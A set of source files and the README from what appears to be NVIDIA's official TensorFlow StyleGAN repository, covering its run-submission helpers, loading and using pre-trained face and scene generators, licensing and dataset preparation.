tf.Variable(np.float32(self.loss_scaling_init), name="loss_scaling_var") return self._dev_ls_var[device] def apply_loss_scaling(self, value: TfExpression) -> TfExpression: """Apply dynamic loss scaling for the given expression.""" assert tfutil.is_tf_expression(value) if not self.use_loss_scaling: return value return value * tfutil.exp2(self.get_loss_scaling_var(value.device)) def undo_loss_scaling(self, value: TfExpression) -> TfExpression: """Undo the effect of dynamic loss scaling for the given expression.""" assert tfutil.is_tf_expression(value) if not self.use_loss_scaling: return value return value * tfutil.exp2(-self.get_loss_scaling_var(value.device)) # pylint: disable=invalid-unary-operand-type File: dnnlib/submission/submit.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Submit a function to be run either locally or in a computing cluster.""" import copy import io import os import pathlib import pickle import platform import pprint import re import shutil import time import traceback import zipfile from enum import Enum from .. import util from ..util import EasyDict class SubmitTarget(Enum): """The target where the function should be run. LOCAL: Run it locally. """ LOCAL = 1 class PathType(Enum): """Determines in which format should a path be formatted. WINDOWS: Format with Windows style. LINUX: Format with Linux/Posix style. AUTO: Use current OS type to select either WINDOWS or LINUX. 
""" WINDOWS = 1 LINUX = 2 AUTO = 3 _user_name_override = None class SubmitConfig(util.EasyDict): """Strongly typed config dict needed to submit runs. Attributes: run_dir_root: Path to the run dir root. Can be optionally templated with tags. Needs to always be run through get_path_from_template. run_desc: Description of the run. Will be used in the run dir and task name. run_dir_ignore: List of file patterns used to ignore files when copying files to the run dir. run_dir_extra_files: List of (abs_path, rel_path) tuples of file paths. rel_path root will be the src directory inside the run dir. submit_target: Submit target enum value. Used to select where the run is actually launched. num_gpus: Number of GPUs used/requested for the run. print_info: Whether to print debug information when submitting. ask_confirmation: Whether to ask a confirmation before submitting. run_id: Automatically populated value during submit. run_name: Automatically populated value during submit. run_dir: Automatically populated value during submit. run_func_name: Automatically populated value during submit. run_func_kwargs: Automatically populated value during submit. user_name: Automatically populated value during submit. Can be set by the user which will then override the automatic value. task_name: Automatically populated value during submit. host_name: Automatically populated value during submit. """ def __init__(self): super().__init__() # run (set these) self.run_dir_root = "" # should always be passed through get_path_from_template self.run_desc = "" self.run_dir_ignore = ["__pycache__", "*.pyproj", "*.sln", "*.suo", ".cache", ".idea", ".vs", ".vscode"] self.run_dir_extra_files = None # submit (set these) self.submit_target = SubmitTarget.LOCAL self.num_gpus = 1 self.print_info = False self.ask_confirmation = False # (automatically populated) self.run_id = None self.run_name = None self.run_dir = None self.run_func_name = None self.run_func_kwargs = None self.user_name = None self.task_name = None self.host_name = "localhost" def get_path_from_template(path_template: str, path_type: PathType = PathType.AUTO) -> str: """Replace tags in the given path template and return either Windows or Linux formatted path.""" # automatically select path type depending on running OS if path_type == PathType.AUTO: if platform.system() == "Windows": path_type = PathType.WINDOWS elif platform.system() == "Linux": path_type = PathType.LINUX else: raise RuntimeError("Unknown platform") path_template = path_template.replace("<USERNAME>", get_user_name()) # return correctly formatted path if path_type == PathType.WINDOWS: return str(pathlib.PureWindowsPath(path_template)) elif path_type == PathType.LINUX: return str(pathlib.PurePosixPath(path_template)) else: raise RuntimeError("Unknown platform") def get_template_from_path(path: str) -> str: """Convert a normal path back to its template representation.""" # replace all path parts with the template tags path = path.replace("\\", "/") return path def convert_path(path: str, path_type: PathType = PathType.AUTO) -> str: """Convert a normal path to template and the convert it back to a normal path with given path type.""" path_template = get_template_from_path(path) path = get_path_from_template(path_template, path_type) return path def set_user_name_override(name: str) -> None: """Set the global username override value.""" global _user_name_override _user_name_override = name def get_user_name(): """Get the current user name.""" if _user_name_override is not None: return 
_user_name_override elif platform.system() == "Windows": return os.getlogin() elif platform.system() == "Linux": try: import pwd # pylint: disable=import-error return pwd.getpwuid(os.geteuid()).pw_name # pylint: disable=no-member except: return "unknown" else: raise RuntimeError("Unknown platform") def _create_run_dir_local(submit_config: SubmitConfig) -> str: """Create a new run dir with increasing ID number at the start.""" run_dir_root = get_path_from_template(submit_config.run_dir_root, PathType.AUTO) if not os.path.exists(run_dir_root): print("Creating the run dir root: {}".format(run_dir_root)) os.makedirs(run_dir_root) submit_config.run_id = _get_next_run_id_local(run_dir_root) submit_config.run_name = "{0:05d}-{1}".format(submit_config.run_id, submit_config.run_desc) run_dir = os.path.join(run_dir_root, submit_config.run_name) if os.path.exists(run_dir): raise RuntimeError("The run dir already exists! ({0})".format(run_dir)) print("Creating the run dir: {}".format(run_dir)) os.makedirs(run_dir) return run_dir def _get_next_run_id_local(run_dir_root: str) -> int: """Reads all directory names in a given directory (non-recursive) and returns the next (increasing) run id. Assumes IDs are numbers at the start of the directory names.""" dir_names = [d for d in os.listdir(run_dir_root) if os.path.isdir(os.path.join(run_dir_root, d))] r = re.compile("^\\d+") # match one or more digits at the start of the string run_id = 0 for dir_name in dir_names: m = r.match(dir_name) if m is not None: i = int(m.group()) run_id = max(run_id, i + 1) return run_id def _populate_run_dir(run_dir: str, submit_config: SubmitConfig) -> None: """Copy all necessary files into the run dir. Assumes that the dir exists, is local, and is writable.""" print("Copying files to the run dir") files = [] run_func_module_dir_path = util.get_module_dir_by_obj_name(submit_config.run_func_name) assert '.' 
in submit_config.run_func_name for _idx in range(submit_config.run_func_name.count('.') - 1): run_func_module_dir_path = os.path.dirname(run_func_module_dir_path) files += util.list_dir_recursively_with_ignore(run_func_module_dir_path, ignores=submit_config.run_dir_ignore, add_base_to_relative=False) dnnlib_module_dir_path = util.get_module_dir_by_obj_name("dnnlib") files += util.list_dir_recursively_with_ignore(dnnlib_module_dir_path, ignores=submit_config.run_dir_ignore, add_base_to_relative=True) if submit_config.run_dir_extra_files is not None: files += submit_config.run_dir_extra_files files = [(f[0], os.path.join(run_dir, "src", f[1])) for f in files] files += [(os.path.join(dnnlib_module_dir_path, "submission", "_internal", "run.py"), os.path.join(run_dir, "run.py"))] util.copy_files_and_create_dirs(files) pickle.dump(submit_config, open(os.path.join(run_dir, "submit_config.pkl"), "wb")) with open(os.path.join(run_dir, "submit_config.txt"), "w") as f: pprint.pprint(submit_config, stream=f, indent=4, width=200, compact=False) def run_wrapper(submit_config: SubmitConfig) -> None: """Wrap the actual run function call for handling logging, exceptions, typing, etc.""" is_local = submit_config.submit_target == SubmitTarget.LOCAL checker = None # when running locally, redirect stderr to stdout, log stdout to a file, and force flushing if is_local: logger = util.Logger(file_name=os.path.join(submit_config.run_dir, "log.txt"), file_mode="w", should_flush=True) else: # when running in a cluster, redirect stderr to stdout, and just force flushing (log writing is handled by run.sh) logger = util.Logger(file_name=None, should_flush=True) import dnnlib dnnlib.submit_config = submit_config try: print("dnnlib: Running {0}() on {1}...".format(submit_config.run_func_name, submit_config.host_name)) start_time = time.time() util.call_func_by_name(func_name=submit_config.run_func_name, submit_config=submit_config, **submit_config.run_func_kwargs) print("dnnlib: Finished {0}() in {1}.".format(submit_config.run_func_name, util.format_time(time.time() - start_time))) except: if is_local: raise else: traceback.print_exc() log_src = os.path.join(submit_config.run_dir, "log.txt") log_dst = os.path.join(get_path_from_template(submit_config.run_dir_root), "{0}-error.txt".format(submit_config.run_name)) shutil.copyfile(log_src, log_dst) finally: open(os.path.join(submit_config.run_dir, "_finished.txt"), "w").close() dnnlib.submit_config = None logger.close() if checker is not None: checker.stop() def submit_run(submit_config: SubmitConfig, run_func_name: str, **run_func_kwargs) -> None: """Create a run dir, gather files related to the run, copy files to the run dir, and launch the run in appropriate place.""" submit_config = copy.copy(submit_config) if submit_config.user_name is None: submit_config.user_name = get_user_name() submit_config.run_func_name = run_func_name submit_config.run_func_kwargs = run_func_kwargs assert submit_config.submit_target == SubmitTarget.LOCAL if submit_config.submit_target in {SubmitTarget.LOCAL}: run_dir = _create_run_dir_local(submit_config) submit_config.task_name = "{0}-{1:05d}-{2}".format(submit_config.user_name, submit_config.run_id, submit_config.run_desc) submit_config.run_dir = run_dir _populate_run_dir(run_dir, submit_config) if submit_config.print_info: print("\nSubmit config:\n") pprint.pprint(submit_config, indent=4, width=200, compact=False) print() if submit_config.ask_confirmation: if not util.ask_yes_no("Continue submitting the job?"): return 
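    # For SubmitTarget.LOCAL the run executes in this process: run_wrapper() sets up
    # logging, invokes the target function, and writes _finished.txt when it returns.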
run_wrapper(submit_config) File: dnnlib/submission/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . import run_context from . import submit File: dnnlib/submission/run_context.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helpers for managing the run/training loop.""" import datetime import json import os import pprint import time import types from typing import Any from . import submit class RunContext(object): """Helper class for managing the run/training loop. The context will hide the implementation details of a basic run/training loop. It will set things up properly, tell if run should be stopped, and then cleans up. User should call update periodically and use should_stop to determine if run should be stopped. Args: submit_config: The SubmitConfig that is used for the current run. config_module: The whole config module that is used for the current run. max_epoch: Optional cached value for the max_epoch variable used in update. """ def __init__(self, submit_config: submit.SubmitConfig, config_module: types.ModuleType = None, max_epoch: Any = None): self.submit_config = submit_config self.should_stop_flag = False self.has_closed = False self.start_time = time.time() self.last_update_time = time.time() self.last_update_interval = 0.0 self.max_epoch = max_epoch # pretty print the all the relevant content of the config module to a text file if config_module is not None: with open(os.path.join(submit_config.run_dir, "config.txt"), "w") as f: filtered_dict = {k: v for k, v in config_module.__dict__.items() if not k.startswith("_") and not isinstance(v, (types.ModuleType, types.FunctionType, types.LambdaType, submit.SubmitConfig, type))} pprint.pprint(filtered_dict, stream=f, indent=4, width=200, compact=False) # write out details about the run to a text file self.run_txt_data = {"task_name": submit_config.task_name, "host_name": submit_config.host_name, "start_time": datetime.datetime.now().isoformat(sep=" ")} with open(os.path.join(submit_config.run_dir, "run.txt"), "w") as f: pprint.pprint(self.run_txt_data, stream=f, indent=4, width=200, compact=False) def __enter__(self) -> "RunContext": return self def __exit__(self, exc_type: Any, exc_value: Any, traceback: Any) -> None: self.close() def update(self, loss: Any = 0, cur_epoch: Any = 0, max_epoch: Any = None) -> None: """Do general housekeeping and keep the state of the context up-to-date. 
Should be called often enough but not in a tight loop.""" assert not self.has_closed self.last_update_interval = time.time() - self.last_update_time self.last_update_time = time.time() if os.path.exists(os.path.join(self.submit_config.run_dir, "abort.txt")): self.should_stop_flag = True max_epoch_val = self.max_epoch if max_epoch is None else max_epoch def should_stop(self) -> bool: """Tell whether a stopping condition has been triggered one way or another.""" return self.should_stop_flag def get_time_since_start(self) -> float: """How much time has passed since the creation of the context.""" return time.time() - self.start_time def get_time_since_last_update(self) -> float: """How much time has passed since the last call to update.""" return time.time() - self.last_update_time def get_last_update_interval(self) -> float: """How much time passed between the previous two calls to update.""" return self.last_update_interval def close(self) -> None: """Close the context and clean up. Should only be called once.""" if not self.has_closed: # update the run.txt with stopping time self.run_txt_data["stop_time"] = datetime.datetime.now().isoformat(sep=" ") with open(os.path.join(self.submit_config.run_dir, "run.txt"), "w") as f: pprint.pprint(self.run_txt_data, stream=f, indent=4, width=200, compact=False) self.has_closed = True File: dnnlib/submission/_internal/run.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for launching run functions in computing clusters. During the submit process, this file is copied to the appropriate run dir. When the job is launched in the cluster, this module is the first thing that is run inside the docker container. """ import os import pickle import sys # PYTHONPATH should have been set so that the run_dir/src is in it import dnnlib def main(): if not len(sys.argv) >= 4: raise RuntimeError("This script needs three arguments: run_dir, task_name and host_name!") run_dir = str(sys.argv[1]) task_name = str(sys.argv[2]) host_name = str(sys.argv[3]) submit_config_path = os.path.join(run_dir, "submit_config.pkl") # SubmitConfig should have been pickled to the run dir if not os.path.exists(submit_config_path): raise RuntimeError("SubmitConfig pickle file does not exist!") submit_config: dnnlib.SubmitConfig = pickle.load(open(submit_config_path, "rb")) dnnlib.submission.submit.set_user_name_override(submit_config.user_name) submit_config.task_name = task_name submit_config.host_name = host_name dnnlib.submission.submit.run_wrapper(submit_config) if __name__ == "__main__": main()
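The submission helpers above are normally driven from a small launcher script. The following is a minimal usage sketch (not a file from this repository); the module path `my_project.training_loop.run` and its keyword argument are placeholders:

```
from dnnlib.submission.submit import SubmitConfig, SubmitTarget, submit_run

submit_config = SubmitConfig()
submit_config.run_dir_root = "results"           # run dirs are created as results/<ID>-<desc>
submit_config.run_desc = "example-run"
submit_config.submit_target = SubmitTarget.LOCAL
submit_config.num_gpus = 1

# submit_run() creates the run dir, copies the source tree into <run_dir>/src,
# pickles the config, and finally calls the named function through run_wrapper().
# The target function is called with `submit_config` plus the extra kwargs below.
submit_run(submit_config, "my_project.training_loop.run", num_epochs=10)
```

Because `run_func_name` is resolved with `util.get_obj_by_name()`, the dotted path must be importable from the current working directory.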
## StyleGAN &mdash; Official TensorFlow Implementation ![Python 3.6](https://img.shields.io/badge/python-3.6-green.svg?style=plastic) ![TensorFlow 1.10](https://img.shields.io/badge/tensorflow-1.10-green.svg?style=plastic) ![cuDNN 7.3.1](https://img.shields.io/badge/cudnn-7.3.1-green.svg?style=plastic) ![License CC BY-NC](https://img.shields.io/badge/license-CC_BY--NC-green.svg?style=plastic) ![Teaser image](./stylegan-teaser.png) **Picture:** *These people are not real &ndash; they were produced by our generator that allows control over different aspects of the image.* This repository contains the official TensorFlow implementation of the following paper: > **A Style-Based Generator Architecture for Generative Adversarial Networks**<br> > Tero Karras (NVIDIA), Samuli Laine (NVIDIA), Timo Aila (NVIDIA)<br> > https://arxiv.org/abs/1812.04948 > > **Abstract:** *We propose an alternative generator architecture for generative adversarial networks, borrowing from style transfer literature. The new architecture leads to an automatically learned, unsupervised separation of high-level attributes (e.g., pose and identity when trained on human faces) and stochastic variation in the generated images (e.g., freckles, hair), and it enables intuitive, scale-specific control of the synthesis. The new generator improves the state-of-the-art in terms of traditional distribution quality metrics, leads to demonstrably better interpolation properties, and also better disentangles the latent factors of variation. To quantify interpolation quality and disentanglement, we propose two new, automated methods that are applicable to any generator architecture. Finally, we introduce a new, highly varied and high-quality dataset of human faces.* For business inquiries, please visit our website and submit the form: [NVIDIA Research Licensing](https://www.nvidia.com/en-us/research/inquiries/) **&#9733;&#9733;&#9733; NEW: [StyleGAN2-ADA-PyTorch](https://github.com/NVlabs/stylegan2-ada-pytorch) is now available; see the full list of versions [here](https://nvlabs.github.io/stylegan2/versions.html) &#9733;&#9733;&#9733;** ## Resources Material related to our paper is available via the following links: - Paper: https://arxiv.org/abs/1812.04948 - Video: https://youtu.be/kSLJriaOumA - Code: https://github.com/NVlabs/stylegan - FFHQ: https://github.com/NVlabs/ffhq-dataset Additional material can be found on Google Drive: | Path | Description | :--- | :---------- | [StyleGAN](https://drive.google.com/open?id=1uka3a1noXHAydRPRbknqwKVGODvnmUBX) | Main folder. | &boxvr;&nbsp; [stylegan-paper.pdf](https://drive.google.com/open?id=1v-HkF3Ehrpon7wVIx4r5DLcko_U_V6Lt) | High-quality version of the paper PDF. | &boxvr;&nbsp; [stylegan-video.mp4](https://drive.google.com/open?id=1uzwkZHQX_9pYg1i0d1Nbe3D9xPO8-qBf) | High-quality version of the result video. | &boxvr;&nbsp; [images](https://drive.google.com/open?id=1-l46akONUWF6LCpDoeq63H53rD7MeiTd) | Example images produced using our generator. | &boxv;&nbsp; &boxvr;&nbsp; [representative-images](https://drive.google.com/open?id=1ToY5P4Vvf5_c3TyUizQ8fckFFoFtBvD8) | High-quality images to be used in articles, blog posts, etc. | &boxv;&nbsp; &boxur;&nbsp; [100k-generated-images](https://drive.google.com/open?id=100DJ0QXyG89HZzB4w2Cbyf4xjNK54cQ1) | 100,000 generated images for different amounts of truncation. 
| &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [ffhq-1024x1024](https://drive.google.com/open?id=14lm8VRN1pr4g_KVe6_LvyDX1PObst6d4) | Generated using Flickr-Faces-HQ dataset at 1024&times;1024. | &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [bedrooms-256x256](https://drive.google.com/open?id=1Vxz9fksw4kgjiHrvHkX4Hze4dyThFW6t) | Generated using LSUN Bedroom dataset at 256&times;256. | &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [cars-512x384](https://drive.google.com/open?id=1MFCvOMdLE2_mpeLPTiDw5dxc2CRuKkzS) | Generated using LSUN Car dataset at 512&times;384. | &boxv;&nbsp; &ensp;&ensp; &boxur;&nbsp; [cats-256x256](https://drive.google.com/open?id=1gq-Gj3GRFiyghTPKhp8uDMA9HV_0ZFWQ) | Generated using LSUN Cat dataset at 256&times;256. | &boxvr;&nbsp; [videos](https://drive.google.com/open?id=1N8pOd_Bf8v89NGUaROdbD8-ayLPgyRRo) | Example videos produced using our generator. | &boxv;&nbsp; &boxur;&nbsp; [high-quality-video-clips](https://drive.google.com/open?id=1NFO7_vH0t98J13ckJYFd7kuaTkyeRJ86) | Individual segments of the result video as high-quality MP4. | &boxvr;&nbsp; [ffhq-dataset](https://drive.google.com/open?id=1u2xu7bSrWxrbUxk-dT-UvEJq8IjdmNTP) | Raw data for the [Flickr-Faces-HQ dataset](https://github.com/NVlabs/ffhq-dataset). | &boxur;&nbsp; [networks](https://drive.google.com/open?id=1MASQyN5m0voPcx7-9K0r5gObhvvPups7) | Pre-trained networks as pickled instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py). | &ensp;&ensp; &boxvr;&nbsp; [stylegan-ffhq-1024x1024.pkl](https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ) | StyleGAN trained with Flickr-Faces-HQ dataset at 1024&times;1024. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-celebahq-1024x1024.pkl](https://drive.google.com/uc?id=1MGqJl28pN4t7SAtSrPdSRJSQJqahkzUf) | StyleGAN trained with CelebA-HQ dataset at 1024&times;1024. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-bedrooms-256x256.pkl](https://drive.google.com/uc?id=1MOSKeGF0FJcivpBI7s63V9YHloUTORiF) | StyleGAN trained with LSUN Bedroom dataset at 256&times;256. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-cars-512x384.pkl](https://drive.google.com/uc?id=1MJ6iCfNtMIRicihwRorsM3b7mmtmK9c3) | StyleGAN trained with LSUN Car dataset at 512&times;384. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-cats-256x256.pkl](https://drive.google.com/uc?id=1MQywl0FNt6lHu8E_EUqnRbviagS7fbiJ) | StyleGAN trained with LSUN Cat dataset at 256&times;256. | &ensp;&ensp; &boxur;&nbsp; [metrics](https://drive.google.com/open?id=1MvYdWCBuMfnoYGptRH-AgKLbPTsIQLhl) | Auxiliary networks for the quality and disentanglement metrics. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [inception_v3_features.pkl](https://drive.google.com/uc?id=1MzTY44rLToO5APn8TZmfR7_ENSe5aZUn) | Standard [Inception-v3](https://arxiv.org/abs/1512.00567) classifier that outputs a raw feature vector. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [vgg16_zhang_perceptual.pkl](https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2) | Standard [LPIPS](https://arxiv.org/abs/1801.03924) metric to estimate perceptual similarity. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [celebahq-classifier-00-male.pkl](https://drive.google.com/uc?id=1Q5-AI6TwWhCVM7Muu4tBM7rp5nG_gmCX) | Binary classifier trained to detect a single attribute of CelebA-HQ. | &ensp;&ensp; &ensp;&ensp; &boxur;&nbsp;&#x22ef; | Please see the file listing for remaining networks. ## Licenses All material, excluding the Flickr-Faces-HQ dataset, is made available under [Creative Commons BY-NC 4.0](https://creativecommons.org/licenses/by-nc/4.0/) license by NVIDIA Corporation. 
You can **use, redistribute, and adapt** the material for **non-commercial purposes**, as long as you give appropriate credit by **citing our paper** and **indicating any changes** that you've made. For license information regarding the FFHQ dataset, please refer to the [Flickr-Faces-HQ repository](https://github.com/NVlabs/ffhq-dataset). `inception_v3_features.pkl` and `inception_v3_softmax.pkl` are derived from the pre-trained [Inception-v3](https://arxiv.org/abs/1512.00567) network by Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens, and Zbigniew Wojna. The network was originally shared under [Apache 2.0](https://github.com/tensorflow/models/blob/master/LICENSE) license on the [TensorFlow Models](https://github.com/tensorflow/models) repository. `vgg16.pkl` and `vgg16_zhang_perceptual.pkl` are derived from the pre-trained [VGG-16](https://arxiv.org/abs/1409.1556) network by Karen Simonyan and Andrew Zisserman. The network was originally shared under [Creative Commons BY 4.0](https://creativecommons.org/licenses/by/4.0/) license on the [Very Deep Convolutional Networks for Large-Scale Visual Recognition](http://www.robots.ox.ac.uk/~vgg/research/very_deep/) project page. `vgg16_zhang_perceptual.pkl` is further derived from the pre-trained [LPIPS](https://arxiv.org/abs/1801.03924) weights by Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, and Oliver Wang. The weights were originally shared under [BSD 2-Clause "Simplified" License](https://github.com/richzhang/PerceptualSimilarity/blob/master/LICENSE) on the [PerceptualSimilarity](https://github.com/richzhang/PerceptualSimilarity) repository. ## System requirements * Both Linux and Windows are supported, but we strongly recommend Linux for performance and compatibility reasons. * 64-bit Python 3.6 installation. We recommend Anaconda3 with numpy 1.14.3 or newer. * TensorFlow 1.10.0 or newer with GPU support. * One or more high-end NVIDIA GPUs with at least 11GB of DRAM. We recommend NVIDIA DGX-1 with 8 Tesla V100 GPUs. * NVIDIA driver 391.35 or newer, CUDA toolkit 9.0 or newer, cuDNN 7.3.1 or newer. ## Using pre-trained networks A minimal example of using a pre-trained StyleGAN generator is given in [pretrained_example.py](./pretrained_example.py). When executed, the script downloads a pre-trained StyleGAN generator from Google Drive and uses it to generate an image: ``` > python pretrained_example.py Downloading https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ .... done Gs Params OutputShape WeightShape --- --- --- --- latents_in - (?, 512) - ... images_out - (?, 3, 1024, 1024) - --- --- --- --- Total 26219627 > ls results example.png # https://drive.google.com/uc?id=1UDLT_zb-rof9kKH0GwiJW_bS9MoZi8oP ``` A more advanced example is given in [generate_figures.py](./generate_figures.py). 
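For reference, here is a minimal end-to-end sketch of a script along the lines of `pretrained_example.py` (the actual file in the repository may differ in details). It assumes that `dnnlib` is on the PYTHONPATH and that `config.py` defines `result_dir` and `cache_dir` as described below:

```
import os
import pickle
import numpy as np
import PIL.Image
import dnnlib
import dnnlib.tflib as tflib
import config

# Create a default tf.Session before unpickling the networks.
tflib.init_tf()

# Download and unpickle the pre-trained generator.
url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl
with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f:
    _G, _D, Gs = pickle.load(f)

# Sample a latent vector and run the long-term average generator Gs.
latents = np.random.RandomState(5).randn(1, Gs.input_shape[1])
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
images = Gs.run(latents, None, truncation_psi=0.7, randomize_noise=True, output_transform=fmt)

# Save the result, e.g. as results/example.png.
os.makedirs(config.result_dir, exist_ok=True)
PIL.Image.fromarray(images[0], 'RGB').save(os.path.join(config.result_dir, 'example.png'))
```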
generate_figures.py reproduces the figures from our paper in order to illustrate style mixing, noise inputs, and truncation:
```
> python generate_figures.py
results/figure02-uncurated-ffhq.png     # https://drive.google.com/uc?id=1U3r1xgcD7o-Fd0SBRpq8PXYajm7_30cu
results/figure03-style-mixing.png       # https://drive.google.com/uc?id=1U-nlMDtpnf1RcYkaFQtbh5oxnhA97hy6
results/figure04-noise-detail.png       # https://drive.google.com/uc?id=1UX3m39u_DTU6eLnEW6MqGzbwPFt2R9cG
results/figure05-noise-components.png   # https://drive.google.com/uc?id=1UQKPcvYVeWMRccGMbs2pPD9PVv1QDyp_
results/figure08-truncation-trick.png   # https://drive.google.com/uc?id=1ULea0C12zGlxdDQFNLXOWZCHi3QNfk_v
results/figure10-uncurated-bedrooms.png # https://drive.google.com/uc?id=1UEBnms1XMfj78OHj3_cx80mUf_m9DUJr
results/figure11-uncurated-cars.png     # https://drive.google.com/uc?id=1UO-4JtAs64Kun5vIj10UXqAJ1d5Ir1Ke
results/figure12-uncurated-cats.png     # https://drive.google.com/uc?id=1USnJc14prlu3QAYxstrtlfXC9sDWPA-W
```

The pre-trained networks are stored as standard pickle files on Google Drive:

```
# Load pre-trained network.
url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl
with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f:
    _G, _D, Gs = pickle.load(f)
    # _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run.
    # _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run.
    # Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot.
```

The above code downloads the file and unpickles it to yield 3 instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py). To generate images, you will typically want to use `Gs` &ndash; the other two networks are provided for completeness. In order for `pickle.load()` to work, you will need to have the `dnnlib` source directory in your PYTHONPATH and a `tf.Session` set as default. The session can be initialized by calling `dnnlib.tflib.init_tf()`.

There are three ways to use the pre-trained generator:

1. Use `Gs.run()` for immediate-mode operation where the inputs and outputs are numpy arrays:
```
# Pick latent vector.
rnd = np.random.RandomState(5)
latents = rnd.randn(1, Gs.input_shape[1])

# Generate image.
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
images = Gs.run(latents, None, truncation_psi=0.7, randomize_noise=True, output_transform=fmt)
```
The first argument is a batch of latent vectors of shape `[num, 512]`. The second argument is reserved for class labels (not used by StyleGAN). The remaining keyword arguments are optional and can be used to further modify the operation (see below). The output is a batch of images, whose format is dictated by the `output_transform` argument.

2. Use `Gs.get_output_for()` to incorporate the generator as a part of a larger TensorFlow expression:
```
latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:])
images = Gs_clone.get_output_for(latents, None, is_validation=True, randomize_noise=True)
images = tflib.convert_images_to_uint8(images)
result_expr.append(inception_clone.get_output_for(images))
```
The above code is from [metrics/frechet_inception_distance.py](./metrics/frechet_inception_distance.py). It generates a batch of random images and feeds them directly to the [Inception-v3](https://arxiv.org/abs/1512.00567) network without having to convert the data to numpy arrays in between.

3.
Look up `Gs.components.mapping` and `Gs.components.synthesis` to access individual sub-networks of the generator. Similar to `Gs`, the sub-networks are represented as independent instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py):
```
src_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in src_seeds)
src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component]
src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs)
```
The above code is from [generate_figures.py](./generate_figures.py). It first transforms a batch of latent vectors into the intermediate *W* space using the mapping network and then turns these vectors into a batch of images using the synthesis network. The `dlatents` array stores a separate copy of the same *w* vector for each layer of the synthesis network to facilitate style mixing.

The exact details of the generator are defined in [training/networks_stylegan.py](./training/networks_stylegan.py) (see `G_style`, `G_mapping`, and `G_synthesis`). The following keyword arguments can be specified to modify the behavior when calling `run()` and `get_output_for()`:

* `truncation_psi` and `truncation_cutoff` control the truncation trick that is performed by default when using `Gs` (&psi;=0.7, cutoff=8). It can be disabled by setting `truncation_psi=1` or `is_validation=True`, and the image quality can be further improved at the cost of variation by setting e.g. `truncation_psi=0.5`. Note that truncation is always disabled when using the sub-networks directly. The average *w* needed to manually perform the truncation trick can be looked up using `Gs.get_var('dlatent_avg')` (a minimal manual-truncation sketch is given at the end of this README).

* `randomize_noise` determines whether to re-randomize the noise inputs for each generated image (`True`, default) or whether to use specific noise values for the entire minibatch (`False`). The specific values can be accessed via the `tf.Variable` instances that are found using `[var for name, var in Gs.components.synthesis.vars.items() if name.startswith('noise')]`.

* When using the mapping network directly, you can specify `dlatent_broadcast=None` to disable the automatic duplication of `dlatents` over the layers of the synthesis network.

* Runtime performance can be fine-tuned via `structure='fixed'` and `dtype='float16'`. The former disables support for progressive growing, which is not needed for a fully-trained generator, and the latter performs all computation using half-precision floating point arithmetic.

## Preparing datasets for training

The training and evaluation scripts operate on datasets stored as multi-resolution TFRecords. Each dataset is represented by a directory containing the same image data in several resolutions to enable efficient streaming. There is a separate *.tfrecords file for each resolution, and if the dataset contains labels, they are stored in a separate file as well. By default, the scripts expect to find the datasets at `datasets/<NAME>/<NAME>-<RESOLUTION>.tfrecords`. The directory can be changed by editing [config.py](./config.py):

```
result_dir = 'results'
data_dir = 'datasets'
cache_dir = 'cache'
```

To obtain the FFHQ dataset (`datasets/ffhq`), please refer to the [Flickr-Faces-HQ repository](https://github.com/NVlabs/ffhq-dataset). To obtain the CelebA-HQ dataset (`datasets/celebahq`), please refer to the [Progressive GAN repository](https://github.com/tkarras/progressive_growing_of_gans).
